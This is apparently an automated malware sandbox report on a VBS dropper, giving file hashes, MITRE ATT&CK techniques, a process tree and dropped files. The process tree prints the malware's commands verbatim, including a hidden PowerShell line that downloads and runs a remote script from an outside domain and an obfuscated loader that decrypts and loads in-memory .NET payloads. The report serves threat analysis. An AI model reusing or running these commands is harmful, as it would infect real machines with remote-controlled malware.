13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace

General

Target

2570_output.vbs
Size

421KB
MD5

1304afcdfc224427dfe647dd10025628
SHA1

54de753563e6a041ca67a90e50c121cd32f2e125
SHA256

13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
SHA512

23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
SSDEEP

6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2316	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2316	powershell.exe
2620	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1928 wrote to memory of 2316	1928	WScript.exe	30
PID 1928 wrote to memory of 2316	1928	WScript.exe	30
PID 1928 wrote to memory of 2316	1928	WScript.exe	30
PID 1928 wrote to memory of 2604	1928	WScript.exe	33
PID 1928 wrote to memory of 2604	1928	WScript.exe	33
PID 1928 wrote to memory of 2604	1928	WScript.exe	33
PID 2604 wrote to memory of 2832	2604	cmd.exe	35
PID 2604 wrote to memory of 2832	2604	cmd.exe	35
PID 2604 wrote to memory of 2832	2604	cmd.exe	35
PID 2832 wrote to memory of 2624	2832	cmd.exe	37
PID 2832 wrote to memory of 2624	2832	cmd.exe	37
PID 2832 wrote to memory of 2624	2832	cmd.exe	37
PID 2832 wrote to memory of 2620	2832	cmd.exe	38
PID 2832 wrote to memory of 2620	2832	cmd.exe	38
PID 2832 wrote to memory of 2620	2832	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2316
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
      4⤵
      PID:2624
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\n1.bat

Filesize
420KB

MD5
a21d4680c8d115c444119d6b1ca6aed6

SHA1
fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2

SHA256
1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f

SHA512
b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7dbcb08235c932987c07e8423ae83e4b

SHA1
f26447b516c232a039dbfec3d6fb33307784f01a

SHA256
8d0293f26f82ca77d40d06413be17cfd8d7bee70026980b22b36b435825ce4cc

SHA512
ea131a763086c827db70d1ce8d706215b638d0764073b217b72923e138fa51d5beb0da37fba1f46d57dd2c73d0e08413eca5bcf5d4ff253039382293028cdcb4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S7Y1R9TZ4L4Z66R5UF30.temp

Filesize
7KB

MD5
7b306eee61e83161e184103c42465bae

SHA1
a6cbafe0104657198390f9fc6ecc8d4e5cd3dfaa

SHA256
c05063ca1970f9e1f7ae2bdfcba88714a9a45739888259fea9667ace00963343

SHA512
13054176d7a4ffb6880d1106df44c1cc01e983700c2bf9cba4bf7af02b29ac084a28671bac97de5527f72f4a1a895d87ac9f3901b9d813166dfbe12df3145a12

Download Submit
memory/2316-7-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2316-9-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2316-10-0x0000000002D5B000-0x0000000002DC2000-memory.dmp

Filesize
412KB

Download
memory/2316-11-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2316-12-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2316-8-0x000007FEF5150000-0x000007FEF5AED000-memory.dmp

Filesize
9.6MB

Download
memory/2316-4-0x000007FEF540E000-0x000007FEF540F000-memory.dmp

Filesize
4KB

Download
memory/2316-5-0x000000001B4A0000-0x000000001B782000-memory.dmp

Filesize
2.9MB

Download
memory/2316-6-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2620-28-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

Filesize
2.9MB

Download
memory/2620-29-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing